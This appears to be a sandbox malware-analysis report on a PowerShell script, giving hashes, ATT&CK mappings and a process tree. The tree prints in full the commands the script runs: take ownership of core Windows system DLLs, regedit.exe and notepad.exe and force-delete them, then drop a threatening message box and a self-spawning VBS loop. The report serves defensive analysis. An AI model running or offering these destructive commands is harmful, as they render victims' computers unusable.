cd80c4f9e20f6f7f2d0694ed8a21aeeedd1bb075ee6794d39fbd0b2f8f85c2f3

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15/07/2024, 15:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script.ps1
Size

2KB
MD5

3254b5618f8278514f8e83dedb5c7996
SHA1

19b12a1ec5e94fca3c1f07b357e74fe791f001bc
SHA256

cd80c4f9e20f6f7f2d0694ed8a21aeeedd1bb075ee6794d39fbd0b2f8f85c2f3
SHA512

9e52971f389e7f0bb5663825d51a938af46fbc48ec49307c314a435ba646d458f9c5748d79099dd289efcb6ce7311bbe301f92820754f3cff11639733629d897

Score

8^/10

discovery execution exploit

Malware Config

Signatures

Possible privilege escalation attempt 28 IoCs

exploit

pid	Process
3884	icacls.exe
1928	takeown.exe
4752	icacls.exe
4864	takeown.exe
4876	icacls.exe
2316	takeown.exe
3636	icacls.exe
2832	icacls.exe
4716	icacls.exe
4508	takeown.exe
1480	icacls.exe
2008	icacls.exe
1924	takeown.exe
2624	icacls.exe
348	icacls.exe
3076	takeown.exe
3268	icacls.exe
368	takeown.exe
4140	icacls.exe
4672	takeown.exe
3232	takeown.exe
4432	takeown.exe
4916	takeown.exe
404	icacls.exe
4420	takeown.exe
464	takeown.exe
3296	icacls.exe
2100	takeown.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation	cmd.exe

Modifies file permissions 1 TTPs 28 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3076	takeown.exe
3268	icacls.exe
2008	icacls.exe
404	icacls.exe
3296	icacls.exe
3636	icacls.exe
2624	icacls.exe
4420	takeown.exe
2832	icacls.exe
2316	takeown.exe
4864	takeown.exe
464	takeown.exe
2100	takeown.exe
4752	icacls.exe
4916	takeown.exe
368	takeown.exe
348	icacls.exe
4432	takeown.exe
3884	icacls.exe
4508	takeown.exe
3232	takeown.exe
1480	icacls.exe
4140	icacls.exe
4876	icacls.exe
1924	takeown.exe
1928	takeown.exe
4672	takeown.exe
4716	icacls.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\die.vbs	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1820	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 3 IoCs

evasion

pid	Process
1172	taskkill.exe
4792	taskkill.exe
1204	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1820	powershell.exe
1820	powershell.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeTakeOwnershipPrivilege	3232	takeown.exe
Token: SeTakeOwnershipPrivilege	3076	takeown.exe
Token: SeTakeOwnershipPrivilege	4432	takeown.exe
Token: SeTakeOwnershipPrivilege	1924	takeown.exe
Token: SeTakeOwnershipPrivilege	2316	takeown.exe
Token: SeTakeOwnershipPrivilege	2100	takeown.exe
Token: SeTakeOwnershipPrivilege	1928	takeown.exe
Token: SeTakeOwnershipPrivilege	4672	takeown.exe
Token: SeTakeOwnershipPrivilege	4864	takeown.exe
Token: SeTakeOwnershipPrivilege	4916	takeown.exe
Token: SeTakeOwnershipPrivilege	368	takeown.exe
Token: SeTakeOwnershipPrivilege	4508	takeown.exe
Token: SeDebugPrivilege	1204	taskkill.exe
Token: SeTakeOwnershipPrivilege	4420	takeown.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeTakeOwnershipPrivilege	464	takeown.exe
Token: SeDebugPrivilege	4792	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1820 wrote to memory of 2304	1820	powershell.exe	84
PID 1820 wrote to memory of 2304	1820	powershell.exe	84
PID 2304 wrote to memory of 3232	2304	cmd.exe	85
PID 2304 wrote to memory of 3232	2304	cmd.exe	85
PID 2304 wrote to memory of 4876	2304	cmd.exe	86
PID 2304 wrote to memory of 4876	2304	cmd.exe	86
PID 1820 wrote to memory of 4012	1820	powershell.exe	87
PID 1820 wrote to memory of 4012	1820	powershell.exe	87
PID 4012 wrote to memory of 3076	4012	cmd.exe	88
PID 4012 wrote to memory of 3076	4012	cmd.exe	88
PID 4012 wrote to memory of 3268	4012	cmd.exe	89
PID 4012 wrote to memory of 3268	4012	cmd.exe	89
PID 1820 wrote to memory of 856	1820	powershell.exe	90
PID 1820 wrote to memory of 856	1820	powershell.exe	90
PID 856 wrote to memory of 4432	856	cmd.exe	91
PID 856 wrote to memory of 4432	856	cmd.exe	91
PID 856 wrote to memory of 3296	856	cmd.exe	92
PID 856 wrote to memory of 3296	856	cmd.exe	92
PID 1820 wrote to memory of 2732	1820	powershell.exe	93
PID 1820 wrote to memory of 2732	1820	powershell.exe	93
PID 2732 wrote to memory of 1924	2732	cmd.exe	94
PID 2732 wrote to memory of 1924	2732	cmd.exe	94
PID 2732 wrote to memory of 2832	2732	cmd.exe	95
PID 2732 wrote to memory of 2832	2732	cmd.exe	95
PID 1820 wrote to memory of 3400	1820	powershell.exe	96
PID 1820 wrote to memory of 3400	1820	powershell.exe	96
PID 3400 wrote to memory of 2316	3400	cmd.exe	97
PID 3400 wrote to memory of 2316	3400	cmd.exe	97
PID 3400 wrote to memory of 1480	3400	cmd.exe	99
PID 3400 wrote to memory of 1480	3400	cmd.exe	99
PID 1820 wrote to memory of 4184	1820	powershell.exe	100
PID 1820 wrote to memory of 4184	1820	powershell.exe	100
PID 4184 wrote to memory of 2100	4184	cmd.exe	101
PID 4184 wrote to memory of 2100	4184	cmd.exe	101
PID 4184 wrote to memory of 3884	4184	cmd.exe	102
PID 4184 wrote to memory of 3884	4184	cmd.exe	102
PID 1820 wrote to memory of 4964	1820	powershell.exe	103
PID 1820 wrote to memory of 4964	1820	powershell.exe	103
PID 4964 wrote to memory of 1928	4964	cmd.exe	105
PID 4964 wrote to memory of 1928	4964	cmd.exe	105
PID 4964 wrote to memory of 4752	4964	cmd.exe	106
PID 4964 wrote to memory of 4752	4964	cmd.exe	106
PID 1820 wrote to memory of 2648	1820	powershell.exe	107
PID 1820 wrote to memory of 2648	1820	powershell.exe	107
PID 2648 wrote to memory of 4672	2648	cmd.exe	108
PID 2648 wrote to memory of 4672	2648	cmd.exe	108
PID 2648 wrote to memory of 4716	2648	cmd.exe	109
PID 2648 wrote to memory of 4716	2648	cmd.exe	109
PID 1820 wrote to memory of 3020	1820	powershell.exe	110
PID 1820 wrote to memory of 3020	1820	powershell.exe	110
PID 3020 wrote to memory of 4864	3020	cmd.exe	111
PID 3020 wrote to memory of 4864	3020	cmd.exe	111
PID 3020 wrote to memory of 2008	3020	cmd.exe	112
PID 3020 wrote to memory of 2008	3020	cmd.exe	112
PID 1820 wrote to memory of 4808	1820	powershell.exe	114
PID 1820 wrote to memory of 4808	1820	powershell.exe	114
PID 4808 wrote to memory of 4916	4808	cmd.exe	115
PID 4808 wrote to memory of 4916	4808	cmd.exe	115
PID 4808 wrote to memory of 404	4808	cmd.exe	116
PID 4808 wrote to memory of 404	4808	cmd.exe	116
PID 1820 wrote to memory of 3856	1820	powershell.exe	117
PID 1820 wrote to memory of 3856	1820	powershell.exe	117
PID 3856 wrote to memory of 368	3856	cmd.exe	118
PID 3856 wrote to memory of 368	3856	cmd.exe	118

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2304
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3232
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4876
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant Everyone:(F) && del/f C:\Windows\System32\user32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4012
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\user32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3076
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\user32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3268
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F) && del/f C:\Windows\System32\kernel32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\kernel32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4432
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3296
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\gdi32.dll && icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\gdi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2732
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\gdi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1924
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2832
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\advapi32.dll && icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\advapi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\advapi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2316
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1480
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ntdll.dll && icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F) && del/f C:\Windows\System32\ntdll.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ntdll.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2100
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3884
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\shell32.dll && icacls C:\Windows\System32\shell32.dll /grant Everyone:(F) && del/f C:\Windows\System32\shell32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\shell32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\shell32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4752
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ole32.dll && icacls C:\Windows\System32\ole32.dll /grant Everyone:(F) && del/f C:\Windows\System32\ole32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ole32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4672
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ole32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4716
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\comdlg32.dll && icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F) && del/f C:\Windows\System32\comdlg32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\comdlg32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4864
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\wininet.dll && icacls C:\Windows\System32\wininet.dll /grant Everyone:(F) && del/f C:\Windows\System32\wininet.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4808
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\wininet.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4916
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\wininet.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:404
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\msvcrt.dll && icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F) && del/f C:\Windows\System32\msvcrt.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3856
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\msvcrt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:368
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3636
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant Everyone:(F) && taskkill /f /im regedit.exe && del/f C:\Windows\regedit.exe"
  2⤵
  PID:3312
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\regedit.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\regedit.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2624
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im regedit.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\notepad.exe && icacls C:\Windows\notepad.exe /grant Everyone:(F) && taskkill /f /im notepad.exe && del/f C:\Windows\notepad.exe"
  2⤵
  PID:5108
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\notepad.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4420
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\notepad.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4140
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im notepad.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\bfsvc.exe && icacls C:\Windows\bfsvc.exe /grant Everyone:(F) && taskkill /f /im bfsvc.exe && del/f C:\Windows\bfsvc.exe"
  2⤵
  PID:5104
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\bfsvc.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:464
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\bfsvc.exe /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im bfsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo msgbox "YOU ARE GOING TO DIE" >> %windir%\die.vbs"
  2⤵
  - Drops file in Windows directory
  PID:3824
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo for i = 1 to 100 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1684
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo createobject("wscript.shell").run "start %windir%\loop.vbs" >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2588
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo next >> %windir%\loop.vbs && start %windir%\loop.vbs"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - Modifies registry class
  PID:4256
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\loop.vbs"
    3⤵
    PID:2096

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qsf3wzv5.ln4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\loop.vbs

Filesize
83B

MD5
8ee085ca996a75945a2d4b105113ffa0

SHA1
3889508589a8499bcf2b22af689cd581836a083b

SHA256
587701b740dbb0a8a7b8a528e4a2df93f0d94379ec014370c70a391052c0171a

SHA512
daad5e796dfb206201aa2e8dedb18a3e2d39ab7d002772218c27224f96ba2582a7533a1b97d27ce20cae576e00afa5902358faf0523a71f22220857bc63b373c

Download Submit
C:\Windows\loop.vbs

Filesize
91B

MD5
c40d8df9297f480185a50211ab445ea5

SHA1
83cfe62aa130c3c526aec6e0f87ce3eb95d311e7

SHA256
eecde88ab73958886e879fedfce2a8ecfa6690d3d28e570403215a2aa4c07513

SHA512
3af78490bd7775648b64d95ee165503ab6f8cb9175226b7fdc58010f747ae0e542cd18a5939fc2a4ee269e01cef9997b5ff240e9db2e48f40a2c371037397652

Download Submit
memory/1820-0-0x00007FFDDAF83000-0x00007FFDDAF85000-memory.dmp

Filesize
8KB

Download
memory/1820-6-0x000001B2DE460000-0x000001B2DE482000-memory.dmp

Filesize
136KB

Download
memory/1820-11-0x00007FFDDAF80000-0x00007FFDDBA41000-memory.dmp

Filesize
10.8MB

Download
memory/1820-12-0x00007FFDDAF80000-0x00007FFDDBA41000-memory.dmp

Filesize
10.8MB

Download
memory/1820-25-0x00007FFDDAF80000-0x00007FFDDBA41000-memory.dmp

Filesize
10.8MB

Download